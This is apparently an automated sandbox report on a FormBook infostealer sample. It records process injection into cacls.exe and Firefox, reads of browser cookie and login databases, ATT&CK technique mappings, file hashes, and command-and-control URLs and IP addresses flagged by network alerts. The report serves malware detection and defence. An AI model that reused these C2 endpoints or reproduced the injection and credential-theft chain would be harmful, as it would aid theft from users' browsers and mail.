                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeMemory written: C:\Users\user\Desktop\PGK60fNNCZ.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: NULL target: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: NULL target: C:\Windows\SysWOW64\cacls.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeThread register set: target process: 5992Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeThread APC queued: target process: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess created: C:\Users\user\Desktop\PGK60fNNCZ.exe "C:\Users\user\Desktop\PGK60fNNCZ.exe"Jump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: QxPduTOtZWkp.exe, 00000008.00000000.1788160602.0000000001241000.00000002.00000001.00040000.00000000.sdmp, QxPduTOtZWkp.exe, 00000008.00000002.2550886638.0000000001240000.00000002.00000001.00040000.00000000.sdmp, QxPduTOtZWkp.exe, 0000000C.00000002.2551757333.0000000001360000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: QxPduTOtZWkp.exe, 00000008.00000000.1788160602.0000000001241000.00000002.00000001.00040000.00000000.sdmp, QxPduTOtZWkp.exe, 00000008.00000002.2550886638.0000000001240000.00000002.00000001.00040000.00000000.sdmp, QxPduTOtZWkp.exe, 0000000C.00000002.2551757333.0000000001360000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: QxPduTOtZWkp.exe, 00000008.00000000.1788160602.0000000001241000.00000002.00000001.00040000.00000000.sdmp, QxPduTOtZWkp.exe, 00000008.00000002.2550886638.0000000001240000.00000002.00000001.00040000.00000000.sdmp, QxPduTOtZWkp.exe, 0000000C.00000002.2551757333.0000000001360000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: QxPduTOtZWkp.exe, 00000008.00000000.1788160602.0000000001241000.00000002.00000001.00040000.00000000.sdmp, QxPduTOtZWkp.exe, 00000008.00000002.2550886638.0000000001240000.00000002.00000001.00040000.00000000.sdmp, QxPduTOtZWkp.exe, 0000000C.00000002.2551757333.0000000001360000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeQueries volume information: C:\Users\user\Desktop\PGK60fNNCZ.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                Source: Yara matchFile source: 6.2.PGK60fNNCZ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.PGK60fNNCZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2549473892.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2550953930.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1866845712.00000000012B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2549241297.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2551691593.00000000028C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1867011916.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                Source: Yara matchFile source: 6.2.PGK60fNNCZ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.PGK60fNNCZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2549473892.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2550953930.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1866845712.00000000012B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2549241297.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2551691593.00000000028C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1867011916.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                Services File Permissions Weakness
                412
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                121
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                1
                Disable or Modify Tools
                LSASS Memory2
                Process Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Services File Permissions Weakness
                41
                Virtualization/Sandbox Evasion
                Security Account Manager41
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares1
                Data from Local System
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading
                412
                Process Injection
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets2
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism
                Cached Domain Credentials113
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Services File Permissions Weakness
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                Software Packing
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Behavior Graph (ID: 1588678, Sample: PGK60fNNCZ.exe, Startdate: 11/01/2025, Architecture: WINDOWS, Score: 100)

                Source | Detection | Scanner | Label | Link
                PGK60fNNCZ.exe | 68% | ReversingLabs | Win32.Backdoor.FormBook |
                PGK60fNNCZ.exe | 79% | Virustotal | | Browse
                PGK60fNNCZ.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
Name | Malicious | Antivirus Detection | Reputation
http://www.golivenow.live/r2k9/ | true | Avira URL Cloud: safe | unknown
http://www.techmiseajour.net/jytl/?-pztsZ6x=g6hM5OfAy0aZTOdzxy+YHDeawhxh9ZVnbH1D7PSRWxwlxqBVZ/VTfAfjReyEGXu+lurHf7fRU8SuqLFFtve4HtQbsAC9MkV/G3NnAml8OZJy5NH6433LttETR9jiekKwjvXYHWThJEDI&jHc=_xZhxrExRJpXy4 | true | Avira URL Cloud: safe | unknown
http://www.techmiseajour.net/jytl/ | true | Avira URL Cloud: safe | unknown
http://www.aktmarket.xyz/wb7v/ | true | Avira URL Cloud: safe | unknown
http://www.christinascuties.net/raea/?-pztsZ6x=PqKj/8KuIq0WSNkJd9VnweLoPwEm47E1M43YI/iJd5qBB0feLv8ZTXGbO6iF0HlQbmuDykhZpdeI6maFWjpp3E/jI7y5iYAByXvyTWq6cDZMSDvdA4QMsGyTH+1ZevuClMSDErjQvhDp&jHc=_xZhxrExRJpXy4 | true | Avira URL Cloud: safe | unknown
http://www.aktmarket.xyz/wb7v/?jHc=_xZhxrExRJpXy4&-pztsZ6x=IA0aHAKfw1DI7BcY57/RaCO2pXyAG0bIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwNMegpUt1fue+iLHYlvG76twMotNjNvt0StR0O0bh5nOABYSyZ3tCxaOT0 | true | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
13.248.169.48 | www.aktmarket.xyz | United States | 16509 | AMAZON-02US | false
84.32.84.32 | techmiseajour.net | Lithuania | 33922 | NTT-LT-ASLT | true
66.29.149.46 | www.golivenow.live | United States | 19538 | ADVANTAGECOMUS | true
74.208.236.156 | www.christinascuties.net | United States | 8560 | ONEANDONE-ASBrauerstrasse48DE | false
                                                          Joe Sandbox version:42.0.0 Malachite
                                                          Analysis ID:1588678
                                                          Start date and time:2025-01-11 04:04:19 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 8m 7s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:14
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:2
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:PGK60fNNCZ.exe
                                                          renamed because original name is a hash value
                                                          Original Sample Name:daae3c4404ba8fc0f82790b718f5a4b13f49e2e5388471fe72da8c8eba5de290.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@11/2@5/4
                                                          EGA Information:
                                                          • Successful, ratio: 75%
                                                          HCA Information:
                                                          • Successful, ratio: 90%
                                                          • Number of executed functions: 161
                                                          • Number of non-executed functions: 281
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 2.23.242.162, 20.109.210.53
                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
Time | Type | Description
22:05:20 | API Interceptor | 1x Sleep call for process: PGK60fNNCZ.exe modified
23:57:10 | API Interceptor | 191531x Sleep call for process: cacls.exe modified
                                                          No context
                                                          Process:C:\Users\user\Desktop\PGK60fNNCZ.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.34331486778365
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                          Malicious:true
                                                          Reputation:high, very likely benign file
                                                          Process:C:\Windows\SysWOW64\cacls.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                          Category:modified
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1215420383712111
                                                          Encrypted:false
                                                          SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                          MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                          SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                          SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                          SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.785745199704202
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Windows Screen Saver (13104/52) 0.07%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          File name:PGK60fNNCZ.exe
                                                          File size:763'904 bytes
                                                          MD5:be729fe26e81cb5d5ab76fa5a235accb
                                                          SHA1:30c08240bae5fe587671eb22edb703e6da07e909
                                                          SHA256:daae3c4404ba8fc0f82790b718f5a4b13f49e2e5388471fe72da8c8eba5de290
                                                          SHA512:d9cd216369869b9a0d53ee8736fd6a7b4de64a8c9fbe6ca05bdc3cfd741d8cbdede0be3d4489fff63652142ffdce4cd9618a08a24453a7e7d7497823bfc64cff
                                                          SSDEEP:12288:I7IWMXthxZxK0M6eUsBG6r9rh11Hc0zdPXOVxcLTNMzQuMgoh1XuDMq/SK:yIR5KX6TstV11HlzFXGeLTNw6fhtuD5/
                                                          TLSH:A5F402286586D816D94267741EB0F2B826BCAEDDE401D31A5FE97DDFBC76F058C80382
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Pg..............0...... ........... ........@.. ....................................@................................
                                                          Icon Hash:0697f0b9b0b1d827
                                                          Entrypoint:0x4ba512
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x67509BAD [Wed Dec 4 18:13:01 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          push ebx
                                                          add byte ptr [ecx+00h], bh
                                                          jnc 00007F3FFCB70AB2h
                                                          je 00007F3FFCB70AB2h
                                                          add byte ptr [ebp+00h], ch
                                                          add byte ptr [ecx+00h], al
                                                          arpl word ptr [eax], ax
                                                          je 00007F3FFCB70AB2h
                                                          imul eax, dword ptr [eax], 00610076h
                                                          je 00007F3FFCB70AB2h
                                                          outsd
                                                          add byte ptr [edx+00h], dh
                                                          add byte ptr [eax], al

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba4c0 | 0x4f | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xbc000 | 0x1de4 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xbe000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |


| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0xb8538 | 0xb8600 | 2eb65f3bf15453efd22a48a542921ca1 | False | 0.9240426377118645 | data | 7.791656574415995 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xbc000 | 0x1de4 | 0x1e00 | cbbfc11dc2ca213cfde301b4022180a4 | False | 0.8514322916666667 | data | 7.387247569285317 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xbe000 | 0xc | 0x200 | b4d73b1260091103d6e50e962bf84d72 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |


| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xbc100 | 0x174e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9639624539054643 |
| RT_GROUP_ICON | 0xbd860 | 0x14 | data | | | 1.05 |
| RT_VERSION | 0xbd884 | 0x360 | data | | | 0.42476851851851855 |
| RT_MANIFEST | 0xbdbf4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |


| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |


| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-11T04:06:30.782095+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 51320 | 74.208.236.156 | 80 | TCP |
| 2025-01-11T04:06:54.258368+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 51324 | 84.32.84.32 | 80 | TCP |
| 2025-01-11T04:07:07.423091+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 51328 | 13.248.169.48 | 80 | TCP |
| 2025-01-11T04:07:20.828709+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 51332 | 66.29.149.46 | 80 | TCP |

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 11, 2025 04:05:43.090971947 CET53619851.1.1.1192.168.2.7
                                                          Jan 11, 2025 04:06:30.206834078 CET5851253192.168.2.71.1.1.1
                                                          Jan 11, 2025 04:06:30.244719028 CET53585121.1.1.1192.168.2.7
                                                          Jan 11, 2025 04:06:46.070787907 CET5427753192.168.2.71.1.1.1
                                                          Jan 11, 2025 04:06:46.123529911 CET53542771.1.1.1192.168.2.7
                                                          Jan 11, 2025 04:06:59.276139021 CET4985653192.168.2.71.1.1.1
                                                          Jan 11, 2025 04:06:59.287982941 CET53498561.1.1.1192.168.2.7
                                                          Jan 11, 2025 04:07:12.431974888 CET6007253192.168.2.71.1.1.1
                                                          Jan 11, 2025 04:07:12.550628901 CET53600721.1.1.1192.168.2.7
                                                          Jan 11, 2025 04:07:26.526067019 CET5549153192.168.2.71.1.1.1
                                                          Jan 11, 2025 04:07:26.537486076 CET53554911.1.1.1192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 04:06:30.206834078 CET | 192.168.2.7 | 1.1.1.1 | 0xaad0 | Standard query (0) | www.christinascuties.net | A (IP address) | IN (0x0001) | false
Jan 11, 2025 04:06:46.070787907 CET | 192.168.2.7 | 1.1.1.1 | 0x9f8d | Standard query (0) | www.techmiseajour.net | A (IP address) | IN (0x0001) | false
